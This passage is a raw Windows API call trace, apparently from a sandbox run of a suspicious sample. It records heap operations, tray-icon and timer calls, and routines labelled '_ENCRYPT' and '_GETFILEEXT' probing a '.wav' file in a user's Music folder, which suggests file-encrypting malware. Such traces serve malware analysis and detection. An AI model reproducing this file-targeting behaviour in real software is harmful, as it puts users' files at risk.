[0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.578] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0184.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.580] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 1 [0184.580] TranslateMessage (lpMsg=0x87f3fc) returned 0 [0184.580] DispatchMessageW (lpMsg=0x87f3fc) returned 0x0 [0184.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.580] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea98) returned 1 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.581] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0184.581] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0184.581] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0184.581] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0184.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.583] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.583] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0184.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0184.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.584] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0184.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.584] CloseHandle (hObject=0x120) returned 1 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.585] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0184.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.586] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0184.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0184.586] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0184.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.586] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0184.586] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.586] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0184.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x8a4c7a00, ftLastWriteTime.dwHighDateTime=0x1d5da34, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 0x90add8 [0184.588] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x8a4c7a00, ftLastWriteTime.dwHighDateTime=0x1d5da34, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 0x90add8 [0184.589] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS 